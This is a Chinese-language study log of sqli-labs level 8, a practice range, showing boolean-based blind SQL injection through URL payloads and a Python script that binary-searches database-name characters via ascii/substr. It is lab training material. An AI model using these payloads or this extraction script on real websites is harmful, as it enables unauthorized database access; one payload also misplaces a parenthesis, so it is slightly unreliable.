sqli-labs学习记录8

less-8

打开靶场。

输入id=1得到了和前面一样的回显。

通过尝试前面的闭合方式,是'))的闭合方式。

我们输入id=1')).

发现没有报错回显。

这关发现回显就2种方式,一种是有字符回显,一种是啥都没,那根据这样的回显方式我们可以使用布尔盲注的方法。

我们可以通过不断改变范围来查看页面的回显,这样我们最后就可以确定一个值,这样循环操作得到最后的结果。

比如我们可以用length函数和二分法来确定数据库的长度。

?id=1' and (select length(database())>1) and 1=1 --+

正常回显。

我们尝试输入

?id=1' and (select length(database()>8)) and 1=1 --+

显示无回显,下面我们输入

?id=1' and (select length(database()>7)) and 1=1 --+

回显正常,再和前面的作比较,我们>8是无回显,>7有回显,说明就剩8是正确的了。通过这种方法我们就确定了数据库名的长度,也可以通过可以再利用ascii函数+substr函数来修改字符串的范围,判断数据库的各个字符的ASCII的值,来转换为最后的数据库名称。

那么根据这种方法,我们可以写一个py脚本来帮助我们解决这些循环的操作。

python 复制代码
import requests

url = "..."


def inject_database(url):
    name = ''

    for i in range(1, 100):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            payload = "1' and ascii(substr((select database()),%d,1)) > %d-- " % (i, mid)
            params = {"id": payload}
            r = requests.get(url, params=params)
            if "You are in..........." in r.text:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2

        if mid == 32:
            break
        name = name + chr(mid)
        print(name)


inject_database(url)

可以看到通过上面的脚本就可以轻松的通过布尔盲注的方式来解决。

查询数据库里的表与字段也可以通过写脚本的方式来执行。这里就不做阐述了。

相关推荐
Blossom.11818 分钟前
量子计算在金融领域的应用与展望
数据库·人工智能·分布式·金融·架构·量子计算·ai集成
Cachel wood18 分钟前
Mysql相关知识2:Mysql隔离级别、MVCC、锁
数据库·python·sql·mysql·中间件·数据分析·django
Hello World呀25 分钟前
oracle查询当前用户所有字段和表
数据库·oracle
ssauuuuuu26 分钟前
Oracle高级语法篇-merge into语句
数据库·oracle
_yingty_40 分钟前
GO语言入门:常用数学函数2
java·学习·算法·golang
一只鹿鹿鹿1 小时前
【测试文档】项目测试文档,测试管理规程,测试计划,测试文档模版,软件测试报告书(Word)
数据库·后端·spring·单元测试
2302_799525741 小时前
【Redis】SpringDataRedis
java·数据库·redis
玩转数据库管理工具FOR DBLENS1 小时前
项目预期管理:超越甘特图,实现客户价值交付
数据库·职场和发展·项目管理·产品经理·数据库开发·甘特图
暴富奥利奥1 小时前
Linux学习——了解和熟悉Linux系统的远程终端登录
linux·学习
凕雨1 小时前
Cesium学习笔记——dem/tif地形的分块与加载
前端·javascript·笔记·学习·arcgis·vue